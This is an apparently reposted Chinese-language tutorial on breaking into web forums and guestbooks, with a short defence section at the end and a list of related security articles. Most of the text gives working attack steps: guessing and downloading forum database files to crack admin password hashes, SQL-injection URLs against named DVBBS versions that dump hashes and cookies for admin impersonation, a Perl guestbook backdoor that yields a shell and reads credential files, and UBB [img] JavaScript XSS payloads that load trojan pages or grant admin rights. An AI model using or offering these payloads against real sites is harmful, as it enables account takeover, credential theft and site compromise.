論壇通用入侵一條龍教學(xué)(圖)

目前網(wǎng)上有種新的趨勢(shì),黑客們的攻擊目標(biāo)開始從網(wǎng)站延伸到論壇和聊天室及留言板等公共場(chǎng)所,而許多用戶的論壇密碼竟然與E-mail和QQ的密碼完全相同,因此對(duì)大家的網(wǎng)絡(luò)安全威脅非常大。換個(gè)角度來說,黑客們通過入侵這些地方,可以得到更高的權(quán)限。比如通過80端口進(jìn)行滲透入侵,甚至于還可以得到論壇和聊天室、留言板等服務(wù)主機(jī)的最高權(quán)限,是不是很可怕?許多人以為只有黑客高手才能做到這一點(diǎn),其實(shí)不然,只要簡(jiǎn)單的幾步,連菜鳥都能得到論壇或聊天室及留言板的一切!本文將以常見的論壇為例,談?wù)勚饕恼搲舴椒ê头婪妒侄巍?br />
第一招:解析論壇數(shù)據(jù)庫
目前很多國內(nèi)論壇都采用了動(dòng)網(wǎng)先鋒引擎(一款由ASPSKY.NET開發(fā)和維護(hù)的asp論壇引擎)。要想控制整個(gè)論壇就得有管理員密碼,怎樣才能得到動(dòng)網(wǎng)論壇的管理員密碼呢?黑客常用的招數(shù)之一是先獲得動(dòng)網(wǎng)論壇的數(shù)據(jù)庫文件,然后再解析數(shù)據(jù)庫中的管理員密碼,不過該數(shù)據(jù)庫文件中的密碼是用MD5加密的,所以要使用工具軟件進(jìn)行解析。舉個(gè)例子,黑客會(huì)可以先猜一下數(shù)據(jù)庫文件存放在哪個(gè)目錄里,如果猜對(duì)的話下載數(shù)據(jù)庫的成功率就比較高了。一般說來,管理員都有個(gè)習(xí)慣,就是給數(shù)據(jù)庫文件存放的目錄起個(gè)好記的名字,如data、database、bd、mdb等。所以黑客們可以在瀏覽器中輸入:http://www.target.com/database或http://www.target.com/mdb或者是http://www.target.com/db試試,如果顯示“HTTP錯(cuò)誤404-找不到文件”,說明對(duì)方?jīng)]有這個(gè)目錄,再換一個(gè)目錄名試試,假設(shè)你輸入http://www.target.com/data,顯示“HTTP錯(cuò)誤403-禁止訪問”,則說明對(duì)方有這個(gè)目錄,但是不允許我們?yōu)g覽該目錄,這樣就有希望了!
下一步只要有辦法找到數(shù)據(jù)庫文件并下載下來就有希望得到對(duì)方的管理員密碼。比方說,黑客可以使用漏洞掃描器X-SCAN掃描目標(biāo),看是否有漏洞,如果目標(biāo)做了端口過濾,只開了80端口,我們可以這樣試試:把一些常用的數(shù)據(jù)庫地址如data.mdb、db.mdb、database.asp等添加到X-Scan的CGI數(shù)據(jù)庫中,或者用一些黑客字典來生成數(shù)據(jù)庫地址,然后單獨(dú)作一個(gè)數(shù)據(jù)庫,把它添加到X-Scan的CGI數(shù)據(jù)庫中。然后只掃描CGI漏洞,過一段時(shí)間掃描完畢,假設(shè)顯示的掃描結(jié)果為“/data/database.asp”,就表示我們成功地掃描到了數(shù)據(jù)庫文件。現(xiàn)在用下載工具把數(shù)據(jù)庫下載下來即可,然后把文件擴(kuò)展名改為.mdb。接下來就可以使用MD5的程序和字典解出密碼。不要小瞧了這個(gè)辦法,許多人就是這樣解析了你的論壇管理員密碼!
第二招:溫柔一刀成為論壇管理員
仍舊以動(dòng)網(wǎng)先鋒論壇為例。最近該論壇出現(xiàn)一個(gè)漏洞,使得普通用戶可以輕松地獲得論壇中任意用戶的密碼,包括管理員在內(nèi)!由于其#asp文件沒有過濾用戶提交SQL查詢的輸入,導(dǎo)致遠(yuǎn)程攻擊者可以利用這個(gè)漏洞進(jìn)行SQL攻擊,進(jìn)而威脅 論壇或服務(wù)器安全。注意,該手段對(duì)DVBBS VER 6.0.0及6.0.0 SP1、SP2都有效,對(duì)低版本的動(dòng)網(wǎng)論壇也有效,而且無論數(shù)據(jù)庫是ACCESS還是MS SQL都通吃。
攻擊方法為:找到你的目標(biāo)論壇,然后輸入其網(wǎng)址,假設(shè)為
http://www.target.com/asp/dvbbs/index.asp,然后查詢管理員的名字,每個(gè)論壇中都有這樣的人,記住該人的論壇ID。接著在瀏覽器地址欄中輸入:http://www.target.com/dvbbs/#asp?orders=2&N=10,注意“N=”后面你可以隨意寫上任何數(shù)字,它表示你想查詢幾個(gè)論壇用戶,回車即可看到該論壇的用戶名(如圖1)??吹狡渲械墓芾韱T的名字了嗎?OK,接下來在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10 userclass,”,這樣就會(huì)查到這些人在論壇中的身份(如圖2),注意其中的管理員身份的人,他具有最高權(quán)限,黑客的目標(biāo)就是他。下一步,請(qǐng)?jiān)诘刂窓谥休斎?ldquo;http://www.target.com/dvbbs/#asp?orders=2&N=10 userid,”,回車后在你看到的窗口中(如圖3)記住管理員的ID在論壇中是第幾位注冊(cè)用戶,假設(shè)為1。再下一步,在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10 userpassword,”,這樣你就會(huì)看到論壇中用戶的密碼(如圖4),可惜是經(jīng)過MD5
加密處理的,但這已經(jīng)足夠了。最后再輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10 usercookies,”,回車后在出現(xiàn)的窗口中(如圖5)記下管理員的usercookies的值,一般為0。好了,到現(xiàn)在黑客就得到管理員的Cookies的內(nèi)容了,他可以通過在本機(jī)中偽造管理員的Cookies來入侵論壇。如果你輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10 quesion,”,還可以得到論壇中用戶忘記密碼時(shí)的密碼提示問題,輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10 answer,”可以得到他的問題答案(也是MD5加密的)!
接下來在該論壇新注冊(cè)一個(gè)新用戶,然后用Cookies管理軟件(如iecv)改造自己在該論壇的Cookies。其實(shí),這一步的目的就是通過Cookies來讓論壇以為你就是管理員,因?yàn)檎搲卸ㄊ欠袷枪芾韱T的主要方法就是通過論壇ID和密碼來實(shí)現(xiàn)的,而Cookies中記錄的正是論壇ID和密碼,當(dāng)然這個(gè)密碼是加密存放在Cookies中的。
運(yùn)行Cookies管理軟件iecv,選擇“View”菜單下的“Obsolete cookie file”,就可以看到你的電腦中的Cookies文件了。由于你是新注冊(cè)的論壇ID,所以在iecv的主界面的最開頭就可以看到該論壇的Cookies文件,在它前面打上“√”,然后右鍵單擊界面中央的aspsky,選擇彈出菜單中的“編輯Cookie的內(nèi)容”(圖6),然后就可以編輯你的Cookies內(nèi)容了,把里面的內(nèi)容替換為你剛剛查到的內(nèi)容即可。最后關(guān)閉該軟件,并關(guān)閉瀏覽器,重新輸入該論壇的地址,進(jìn)入后黑客就會(huì)成為該論壇的管理員了!此時(shí)這個(gè)論壇就在黑客的掌握之中了,干什么都可以隨心所欲了!
舉個(gè)例子,黑客可以在打開記事本后按下tab鍵或CapsLock Tab鍵,這樣就會(huì)形成一個(gè)特殊的空格。復(fù)制該空格,用他想冒名發(fā)言的用戶名加上該空格注冊(cè)一個(gè)新用戶,這樣就會(huì)成功注冊(cè)一個(gè)和對(duì)方一樣的名字,接下來就可以冒名發(fā)言了,稍不留意別人就會(huì)上當(dāng)。形成特殊空格還可以采用區(qū)位輸入法輸入aaaa或aaab或aaac。另外在html標(biāo)簽里還可以使用 ( 就是顯示空白內(nèi)容的意思)制造一個(gè)特殊的空格。用區(qū)位輸入法輸入的aaaa/aaab/aaac在ASP編寫的程序里冒名的成功率極高,而tab鍵和 制造的特殊空格在php程序里成功率更高些。更可怕的是,在wdb論壇和ibb論壇,用Tab鍵構(gòu)造的特殊用戶名可以取得和原用戶相同的權(quán)限。如果原用戶名是管理員,那黑客構(gòu)造的這個(gè)冒名用戶也會(huì)變成管理員! 第三招:暗渡陳倉形成網(wǎng)頁后門
大家知道,在cgi或perl程序里如果寫入“system @ARGV;#”(注意輸入時(shí)沒有引號(hào)),就會(huì)形成一個(gè)有趣的網(wǎng)頁后門。在IE地址欄中輸入http://ip/*.pl?dir就會(huì)看到網(wǎng)站的物理目錄。以網(wǎng)上非常流行的Agbii免費(fèi)cgi留言本為例,該留言本里的留言是以第n條留言的數(shù)目、用戶名、標(biāo)題和內(nèi)容等等來排列的,而且留言都是按照順序排放在一個(gè)固定目錄data/用戶名下面的。說起來好像很復(fù)雜,讓我們來看圖7,假設(shè)這是黑客在Agbii免費(fèi)cgi留言本中的留言,它是該留言本中的第14條留言,假設(shè)其注冊(cè)的用戶名是;system,標(biāo)題為@ARGV;#,內(nèi)容則是“呵呵”,在data/222目錄下的14.pl的文件內(nèi)容就是如圖8所示。由于此留言本的用戶就是222,因此只要黑客在瀏覽器地址欄中輸入http://IP/book/data/222/14.pl?dir就會(huì)得到一個(gè)shell了(圖9)。注意這里的http://IP/book/是留言本的地址。得到shell之后,黑客還可以得到該管理員的密碼!只要在瀏覽器的地址欄中輸入“http://IP/book/data/管理員名字/14.pl?type 該留言本的物理目錄\user\管理員名字.cgi”就可以了。以本文為例,只要輸入“http://www.xxx.com/book/data/lxgyp/14.pl?type d:\虛擬主機(jī)\web\book\user\lxgyp.cgi”就可以得到該管理員的用戶名和密碼、注冊(cè)時(shí)的郵件地址、他的網(wǎng)站地址、IP地址以及登陸時(shí)間,一目了然,盡在掌握!
還有一種比較有趣也比較難利用的方法,其實(shí)就是所謂的跨站腳本攻擊。先說一個(gè)有趣的現(xiàn)象,在論壇中流行的UBB代碼中有一個(gè)bug,[img]和[/img]這對(duì)標(biāo)簽是UBB代碼中經(jīng)常會(huì)用到的,用來引用一個(gè)圖片。在[img]和[/img]中如果插入的不是圖像而是javascript腳本它同樣會(huì)執(zhí)行!舉個(gè)例子,如假設(shè)你在某論壇中所發(fā)帖子內(nèi)容為:[img]javascript:alert("黑客")[/img],當(dāng)有人點(diǎn)擊這個(gè)貼子就會(huì)彈出一個(gè)對(duì)話框。
如果把上面的內(nèi)容換為:[img]javascript:alert("黑客");self.open("http://url")[/img],
則點(diǎn)擊后不僅會(huì)彈出一個(gè)對(duì)話框,而且還會(huì)打開一個(gè)新的網(wǎng)頁窗口。如果黑客在這個(gè)網(wǎng)頁里放入網(wǎng)頁木馬會(huì)怎么樣呢?答案是你會(huì)中木馬!不僅如此,利用這個(gè)辦法還可以使論壇中沒有任何權(quán)限的用戶提升為管理員!假設(shè)某論壇加新管理員hacker的url是http://ip/bbs/upadmin?user=hacker,由于這個(gè)url只有以管理員身份執(zhí)行才可以成功,所以你直接在地址欄中輸入是沒有任何用處的。但是利用剛剛提到的跨站腳本攻擊,只要黑客先注冊(cè)一個(gè)名為hacker的用戶,然后新建一個(gè)帖子,在里面寫入:[img]javascript:alert("黑客");self.open("http://ip/bbs/upadmin?user=hacker")[/img],然后給這個(gè)帖子起個(gè)醒目的主題,如“管理員論壇好像有大漏洞”,來引誘該論壇的管理員來查看此貼,當(dāng)管理員點(diǎn)擊此貼后,hacker這個(gè)用戶就會(huì)提升為該論壇的管理員!同樣的道理,黑客還可以上傳一個(gè)txt附件,txt文件里就是那個(gè)加hacker管理員的url,由于IE瀏覽器存在一個(gè)問題,即只要文件里面含有html代碼就會(huì)執(zhí)行(IE才不理會(huì)后綴名是什么呢),所以論壇管理員只要點(diǎn)此txt附件,就會(huì)在論壇中增加一個(gè)名為hacker的管理員。如果對(duì)[img][/img]之間或txt附件里面的代碼進(jìn)行精心偽造,黑客還可以讓論壇管理員在點(diǎn)擊帖子或txt附件后毫無察覺,所以很難防范。
之所以會(huì)出現(xiàn)論壇或留言板等遭受攻擊,關(guān)鍵是由于有漏洞存在,只要將這些漏洞堵上就沒有問題了。但是許多漏洞的存在是由于論壇或留言板編程時(shí)作者的疏漏所致,作為使用者是較難防范的,我們只能寄希望于作者早日解決這些問題。從這個(gè)角度來說,論壇管理員經(jīng)常給自己的論壇打補(bǔ)丁是必不可少的。應(yīng)該經(jīng)常留心各大黑客組織發(fā)布的漏洞公告,及時(shí)發(fā)現(xiàn)自己的論壇所存在的問題。再有,要嚴(yán)格過濾特殊字符,防止有人利用特殊字符進(jìn)行攻擊。無論是管理員還是論壇中的普通用戶,都建議您能設(shè)置一個(gè)強(qiáng)壯的密碼,并定期更換,以防止別人解析你的密碼。
針對(duì)論壇數(shù)據(jù)庫被人下載下來然后解析的問題,建議管理員能將論壇的數(shù)據(jù)庫文件改成一個(gè)沒有規(guī)律的復(fù)雜名字,并將擴(kuò)展名由mdb改為asa,如3sdal9eklz9c0ad.asa,3sdal9eklz9c0ad.inc等,有點(diǎn)像用MD5加密過,對(duì)吧?同時(shí)還要將該文件放到深層目錄中,這樣在一定程度上可以減少被人下載的危險(xiǎn)。
將數(shù)據(jù)庫database.mdb改成#database.mdb,這是最簡(jiǎn)單有效的辦法。我們來解釋一下這樣做的好處:假設(shè)別人得到你的數(shù)據(jù)庫地址串將是:http://www.yourserver.com/yourfolder/#database.mdb,但實(shí)際上他得到是:http://www.yourserver.com/yourfolder/,因?yàn)?在這里起到間斷符的作用,地址串遇到#號(hào),自動(dòng)認(rèn)為訪問地址串結(jié)束。注意不要設(shè)置目錄可訪問,用這種方法,不管別人用何種工具都無法下載。注:只要數(shù)據(jù)庫文件名任何地方含有'#',別人都無法正常下載。同理,空格號(hào)也可以起到'#'號(hào)作用,但必須是文件名中間出現(xiàn)空格。
另外,還要使用Access軟件來為數(shù)據(jù)庫文件編碼及加密。首先選取 “工具→安全→加密/解密數(shù)據(jù)庫”,選取數(shù)據(jù)庫文件然后確定,接著會(huì)出現(xiàn)“數(shù)據(jù)庫加密后另存為”的窗口,確定后文件就會(huì)被編碼加密。以上的操作并不是對(duì)數(shù)據(jù)庫設(shè)置密碼,而只是對(duì)數(shù)據(jù)庫文件加以編碼,目的是為了防止他人使用別的工具來查看數(shù)據(jù)庫文件的內(nèi)容。接下來還可以為數(shù)據(jù)庫設(shè)置訪問密碼。首先打開經(jīng)過編碼的庫文件, 在打開時(shí),選擇“獨(dú)占”方式。然后選取功能表的“工具→安全→設(shè)置數(shù)據(jù)庫密碼”,接著輸入密碼即可。這樣即使他人得到了這個(gè)文件,沒有密碼也是無法看到內(nèi)容的。這樣就算黑客知道Access數(shù)據(jù)庫的名字也無法輕易下載,這種方法通常在租用別人服務(wù)器時(shí)使用。最后,建議您在IIS中把數(shù)據(jù)庫所在的目錄設(shè)為不可讀,這樣就可以防止文件被人下載了!
對(duì)于普通用戶而言,建議大家不要在論壇中留下真實(shí)的聯(lián)絡(luò)方式,如E-mail和QQ等,如果非要留下不可,論壇中你的密碼一定不要和其他密碼相同,免得被人順藤摸瓜,得到你的全部秘密!
相關(guān)文章
什么是CC攻擊 判斷網(wǎng)站是否被CC攻擊并且如何防御CC攻擊
CC主要是用來攻擊頁面的,大家都有這樣的經(jīng)歷,就是在訪問論壇時(shí),如果這個(gè)論壇比較大,訪問的人比較多,打開頁面的速度會(huì)比較慢,對(duì)不?!一般來說,訪問的人越多,論壇的頁2024-01-06Windows系統(tǒng)安全風(fēng)險(xiǎn)-本地NTLM重放提權(quán)
入侵者主要通過Potato程序攻擊擁有SYSTEM權(quán)限的端口偽造網(wǎng)絡(luò)身份認(rèn)證過程,利用NTLM重放機(jī)制騙取SYSTEM身份令牌,最終取得系統(tǒng)權(quán)限,該安全風(fēng)險(xiǎn)微軟并不認(rèn)為存在漏洞,所以2021-04-15- 這篇文章主要介紹了文件上傳漏洞全面滲透分析小結(jié),這里主要為大家分享一下防御方法,需要的朋友可以參考下2021-03-21
- 這篇文章主要介紹了sql手工注入語句&SQL手工注入大全,需要的朋友可以參考下2017-09-06
- 這篇文章主要介紹了詳解Filezilla server 提權(quán),需要的朋友可以參考下2017-05-13
FileZilla Server 2008 x64 提權(quán)與防御方法
這篇文章主要介紹了FileZilla Server 2008 x64 提權(quán)與防御方法,需要的朋友可以參考下2017-05-13https加密也被破解 HEIST攻擊從加密數(shù)據(jù)獲取明文
不久之前我們說過關(guān)于http和https的區(qū)別,對(duì)于加密的https,我們一直認(rèn)為它是相對(duì)安全的,可今天要講的是,一種繞過HTTPS加密得到明文信息的web攻擊方式,不知道這消息對(duì)你2016-08-10iPhone和Mac也會(huì)被黑 一條iMessage密碼可能就被盜了
一直以來蘋果系統(tǒng)的安全性都是比安卓要高的,但是再安全的系統(tǒng)也免不了漏洞,蘋果也一樣。最近爆出的新漏洞,只需要接收一條多媒體信息或者iMessage就會(huì)導(dǎo)致用戶信息泄露。2016-07-27- 國家正在修正關(guān)于黑客方面的法律法規(guī),有一條震驚黑客圈的“世紀(jì)佳緣”起訴白帽黑客事件,深深的傷害了廣大黑客們的心,加上扎克伯格和特拉維斯·卡蘭尼克賬號(hào)被盜,于是黑2016-07-11
如何逆向破解HawkEye keylogger鍵盤記錄器進(jìn)入攻擊者郵箱
面對(duì)惡意郵件攻擊,我們就只能默默忍受被他攻擊,連自我保護(hù)能力都沒有談什么反抗?讓人痛快的是,如今有了解決辦法,逆向破解鍵盤記錄器,進(jìn)入攻擊者郵箱2016-07-06